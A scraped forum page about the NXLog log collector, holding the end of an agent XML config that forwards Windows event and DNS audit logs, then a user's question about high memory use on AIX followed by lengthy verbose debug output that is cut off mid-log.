<!-- IP address of NXlog Manager --> <connection-port>4041</connection-port> <verbatim></verbatim> </global-config> <route> <name>route1</name> <priority>0</priority> <module-route> <module-id>RIN</module-id> </module-route> <module-route> <module-id>eventlog</module-id> </module-route> <module-route> <module-id>dnsaudit</module-id> </module-route> </route> <module> <name>RIN</name> <module>om_tcp</module> <config xsi:type="module-connect-address-config-mapping" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <type>OUTPUT</type> <verbatim>Exec to_syslog_snare();</verbatim> <connect-address>172.16.1.43</connect-address> <!-- IP address of log collector --> <port>517</port> <!-- Port used to collect logs by collector. Traffic is syslog but we've opted to not use standard port 514 to facilitate easier splitting of collected logs. --> <output-format>LineBased</output-format> </config> </module> <module> <name>eventlog</name> <module>im_msvistalog</module> <config xsi:type="module-windows-vista-log-in-config-mapping" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <type>INPUT</type> <verbatim>&lt;QueryXML&gt; &lt;QueryList&gt; &lt;Query Id="0"&gt; &lt;Select Path="Security"&gt;*&lt;/Select&gt; &lt;/Query&gt; &lt;Query Id="1"&gt; &lt;Select Path="Application"&gt;*&lt;/Select&gt; &lt;/Query&gt; &lt;Query Id="2"&gt; &lt;Select Path="System"&gt;*&lt;/Select&gt; &lt;/Query&gt; &lt;/QueryList&gt; &lt;/QueryXML&gt;</verbatim> <savePosition>true</savePosition> <read-from-last-position>true</read-from-last-position> <query></query> <channel></channel> <remote>false</remote> <server></server> <user-name></user-name> <domain></domain> <password></password> <auth-method>Default</auth-method> </config> </module> <module> <name>dnsaudit</name> <module>im_etw</module> <config xsi:type="module-event-tracing-for-windows-in-config-mapping" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <type>INPUT</type> <verbatim></verbatim> <provider>Microsoft-Windows-DNSServer</provider> <level>Verbose</level> </config> </module> </agent>

nervevector
Replies: 5
View post »
nervevector
Memory Consumption Is High
Hi Team, Installed the "nxlog-5.4.7313_aix_ppc.rpm" package and installed on AIX device but nxloger consuming nearly 500MB RAM Can you please lett me know how to reduce the resource consumption. getting the below debug logs, please suggest to is there any issue -bash-4.3# /opt/nxlog/bin/nxlog -v 2022-08-25 16:12:59 DEBUG [CORE|main] Setting up module 'multiline' using xm_multiline 2022-08-25 16:12:59 DEBUG [CORE|main] Setting up module '_xml' using xm_xml 2022-08-25 16:12:59 DEBUG [CORE|main] module _xml has 1 exported functions 2022-08-25 16:12:59 DEBUG [CORE|main] registering function to_xml 2022-08-25 16:12:59 DEBUG [CORE|main] function 'to_xml' registered 2022-08-25 16:12:59 DEBUG [CORE|main] module _xml has 5 exported procedures 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure parse_xml 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'parse_xml' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure parse_xml 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'parse_xml' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure to_xml 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'to_xml' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure parse_windows_eventlog_xml 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'parse_windows_eventlog_xml' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure parse_windows_eventlog_xml 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'parse_windows_eventlog_xml' registered 2022-08-25 16:12:59 DEBUG [CORE|main] Setting up module 'filein' using im_file 2022-08-25 16:12:59 DEBUG [CORE|main] module filein has 2 exported functions 2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_name 2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_name' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering function record_number 2022-08-25 16:12:59 DEBUG [CORE|main] function 'record_number' registered 2022-08-25 16:12:59 DEBUG [CORE|main] module filein has 0 exported procedures 2022-08-25 16:12:59 DEBUG [CORE|main] FlowControl enabled for filein 2022-08-25 16:12:59 DEBUG [CORE|main] Setting up module 'fim' using im_fim 2022-08-25 16:12:59 DEBUG [CORE|main] module fim has 1 exported functions 2022-08-25 16:12:59 DEBUG [CORE|main] registering function is_scanning 2022-08-25 16:12:59 DEBUG [CORE|main] function 'is_scanning' registered 2022-08-25 16:12:59 DEBUG [CORE|main] module fim has 1 exported procedures 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure start_scan 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'start_scan' registered 2022-08-25 16:12:59 DEBUG [CORE|main] FlowControl enabled for fim 2022-08-25 16:12:59 DEBUG [CORE|main] Setting up module 'fileout' using om_tcp 2022-08-25 16:12:59 DEBUG [CORE|main] module fileout has 0 exported functions 2022-08-25 16:12:59 DEBUG [CORE|main] module fileout has 1 exported procedures 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure reconnect 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'reconnect' registered 2022-08-25 16:12:59 DEBUG [CORE|main] FlowControl enabled for fileout 2022-08-25 16:12:59 DEBUG [CORE|main] Setting up module '_fileop' using xm_fileop 2022-08-25 16:12:59 DEBUG [CORE|main] module _fileop has 12 exported functions 2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_read 2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_read' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_exists 2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_exists' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_basename 2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_basename' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_dirname 2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_dirname' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_mtime 2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_mtime' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_ctime 2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_ctime' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_type 2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_type' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_size 2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_size' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_hash 2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_hash' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_inode 2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_inode' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering function dir_temp_get 2022-08-25 16:12:59 DEBUG [CORE|main] function 'dir_temp_get' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering function dir_exists 2022-08-25 16:12:59 DEBUG [CORE|main] function 'dir_exists' registered 2022-08-25 16:12:59 DEBUG [CORE|main] module _fileop has 17 exported procedures 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_cycle 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_cycle' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_cycle 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_cycle' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_rename 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_rename' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_copy 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_copy' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_remove 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_remove' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_remove 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_remove' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_link 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_link' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_append 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_append' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_write 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_write' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_truncate 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_truncate' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_truncate 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_truncate' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_chown 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_chown' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_chown 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_chown' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_chmod 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_chmod' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_touch 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_touch' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure dir_make 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'dir_make' registered 2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure dir_remove 2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'dir_remove' registered 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] CONFIG: multiline 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexpquote start 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [^] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] adding string [^] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [<] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [<] to [^] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [A] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [A] to [^<] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [u] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [u] to [^<A] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [d] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [d] to [^<Au] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [i] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [i] to [^<Aud] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [t] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [t] to [^<Audi] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [R] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [R] to [^<Audit] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [e] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [e] to [^<AuditR] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [c] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [c] to [^<AuditRe] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [o] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [o] to [^<AuditRec] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [r] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [r] to [^<AuditReco] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [d] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [d] to [^<AuditRecor] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [>] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [>] to [^<AuditRecord] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexpquote end 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexpmodifiers end with eof 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp literal 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] new regexp: /^<AuditRecord>/ 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp declared at line 42, character 32 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] literal 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] parsed expression 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexpquote start 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [^] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] adding string [^] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [<] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [<] to [^] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append slash 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [/] to [^<] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [A] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [A] to [^</] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [u] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [u] to [^</A] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [d] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [d] to [^</Au] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [i] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [i] to [^</Aud] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [t] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [t] to [^</Audi] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [R] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [R] to [^</Audit] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [e] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [e] to [^</AuditR] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [c] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [c] to [^</AuditRe] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [o] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [o] to [^</AuditRec] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [r] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [r] to [^</AuditReco] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [d] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [d] to [^</AuditRecor] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [>] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [>] to [^</AuditRecord] 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexpquote end 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexpmodifiers end with eof 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp literal 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] new regexp: /^</AuditRecord>/ 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp declared at line 43, character 34 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] literal 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] parsed expression 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] inputreader 'multiline' registered 2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] Inputreader 'multiline' registered 2022-08-25 16:12:59 DEBUG [xm_xml|_xml] CONFIG: _xml 2022-08-25 16:12:59 DEBUG [im_file|filein] CONFIG: filein 2022-08-25 16:12:59 DEBUG [im_file|filein] adding string [/oraaud/oracle/adump/SVBO/.xml] 2022-08-25 16:12:59 DEBUG [im_file|filein] string literal declared at line 56, character 45 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [im_file|filein] literal 2022-08-25 16:12:59 DEBUG [im_file|filein] parsed expression 2022-08-25 16:12:59 DEBUG [im_file|filein] adding string [The Raw Event is ] 2022-08-25 16:12:59 DEBUG [im_file|filein] string literal declared at line 58, character 37 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [im_file|filein] literal 2022-08-25 16:12:59 DEBUG [im_file|filein] nx_expr_new_field: raw_event 2022-08-25 16:12:59 DEBUG [im_file|filein] field declared at line 58, character 49 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [im_file|filein] binary operation declared at line 58, character 50 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [im_file|filein] nx_expr_new_procedure: log_info 2022-08-25 16:12:59 DEBUG [im_file|filein] global procedure: log_info 2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure log_debug (NULL - NULL) 2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure debug (NULL - NULL) 2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure log_info (NULL - NULL) 2022-08-25 16:12:59 DEBUG [im_file|filein] log_info declared at line 58, character 51 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [im_file|filein] procedure 2022-08-25 16:12:59 DEBUG [im_file|filein] statement: procedure 2022-08-25 16:12:59 DEBUG [im_file|filein] finished parsing statements 2022-08-25 16:12:59 DEBUG [im_file|filein] adding string [The Source Address is ] 2022-08-25 16:12:59 DEBUG [im_file|filein] string literal declared at line 59, character 42 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [im_file|filein] literal 2022-08-25 16:12:59 DEBUG [im_file|filein] nx_expr_new_field: sourceaddr 2022-08-25 16:12:59 DEBUG [im_file|filein] field declared at line 59, character 56 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [im_file|filein] binary operation declared at line 59, character 57 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [im_file|filein] nx_expr_new_procedure: log_info 2022-08-25 16:12:59 DEBUG [im_file|filein] global procedure: log_info 2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure log_debug (NULL - NULL) 2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure debug (NULL - NULL) 2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure log_info (NULL - NULL) 2022-08-25 16:12:59 DEBUG [im_file|filein] log_info declared at line 59, character 58 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [im_file|filein] procedure 2022-08-25 16:12:59 DEBUG [im_file|filein] statement: procedure 2022-08-25 16:12:59 DEBUG [im_file|filein] finished parsing statements 2022-08-25 16:12:59 DEBUG [im_file|filein] adding string [The Message is ] 2022-08-25 16:12:59 DEBUG [im_file|filein] string literal declared at line 60, character 35 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [im_file|filein] literal 2022-08-25 16:12:59 DEBUG [im_file|filein] nx_expr_new_field: Message 2022-08-25 16:12:59 DEBUG [im_file|filein] field declared at line 60, character 46 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [im_file|filein] binary operation declared at line 60, character 47 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [im_file|filein] nx_expr_new_procedure: log_info 2022-08-25 16:12:59 DEBUG [im_file|filein] global procedure: log_info 2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure log_debug (NULL - NULL) 2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure debug (NULL - NULL) 2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure log_info (NULL - NULL) 2022-08-25 16:12:59 DEBUG [im_file|filein] log_info declared at line 60, character 48 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [im_file|filein] procedure 2022-08-25 16:12:59 DEBUG [im_file|filein] statement: procedure 2022-08-25 16:12:59 DEBUG [im_file|filein] finished parsing statements 2022-08-25 16:12:59 DEBUG [im_fim|fim] CONFIG: fim 2022-08-25 16:12:59 DEBUG [im_fim|fim] adding string [/file/path] 2022-08-25 16:12:59 DEBUG [im_fim|fim] string literal declared at line 67, character 24 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [im_fim|fim] literal 2022-08-25 16:12:59 DEBUG [im_fim|fim] parsed expression 2022-08-25 16:12:59 DEBUG [im_fim|fim] adding string [.bak] 2022-08-25 16:12:59 DEBUG [im_fim|fim] string literal declared at line 68, character 19 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [im_fim|fim] literal 2022-08-25 16:12:59 DEBUG [im_fim|fim] parsed expression 2022-08-25 16:12:59 DEBUG [im_fim|fim] adding string [/opt/nxlog/*] 2022-08-25 16:12:59 DEBUG [im_fim|fim] string literal declared at line 69, character 26 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [im_fim|fim] literal 2022-08-25 16:12:59 DEBUG [im_fim|fim] parsed expression 2022-08-25 16:12:59 DEBUG [om_tcp|fileout] CONFIG: fileout 2022-08-25 16:12:59 WARNING [om_tcp|fileout] The 'Port' directive is deprecated in favor of the the new 'host:port' syntax from 'ListenAddr', and will be removed in a future version 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] CONFIG: _fileop 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] adding string [/opt/nxlog/var/log/nxlog/nxlog.log] 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] string literal declared at line 102, character 65 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] literal 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] nx_expr_new_function: file_exists 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] global function: file_exists 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] file_exists declared at line 102, character 66 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] new function: file_exists 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] adding string [/opt/nxlog/var/log/nxlog/nxlog.log] 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] string literal declared at line 103, character 64 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] literal 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] nx_expr_new_function: file_size 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] global function: file_size 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] file_size declared at line 103, character 65 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] new function: file_size 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] integer literal: 5M 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] integer literal declared at line 103, character 71 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] literal 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] binary operation declared at line 103, character 72 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] ( expr:5 ) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] binary operation declared at line 103, character 74 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] ( expr:5 ) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] adding string [/opt/nxlog/var/log/nxlog/nxlog.log] 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] string literal declared at line 105, character 64 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] literal 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] integer literal: 8 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] integer literal declared at line 105, character 67 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] literal 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] nx_expr_new_procedure: file_cycle 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] global procedure: file_cycle 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure log_debug (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure debug (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure log_info (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure log_warning (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure log_error (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete_all (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_var (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_var (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_var (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete_var (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure set_var (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete_stat (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure add_stat (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure add_stat (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure sleep (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure drop (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure rename_field (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure rename_field (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure reroute (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure add_to_route (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure duplicate_guard (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure module_stop (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure module_start (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure module_restart (NULL - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure parse_xml (_xml - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure parse_xml (_xml - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure to_xml (_xml - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure parse_windows_eventlog_xml (_xml - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure parse_windows_eventlog_xml (_xml - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure start_scan (fim - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure reconnect (fileout - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure file_cycle (_fileop - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure file_cycle (_fileop - NULL) 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] file_cycle declared at line 105, character 69 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] procedure 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] statement: procedure 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] block declared at line 106, character 13 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] statement: block 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] if-else declared at line 106, character 13 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] if 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] finished parsing statements 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] adding string [/opt/nxlog/var/log/nxlog/nxlog.log] 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] string literal declared at line 115, character 67 in /opt/nxlog/etc/nxlog.conf 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] literal 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] nx_expr_new_function: file_exists 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] global function: file_exists 2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] file_exists declared at line 115, character 68 in 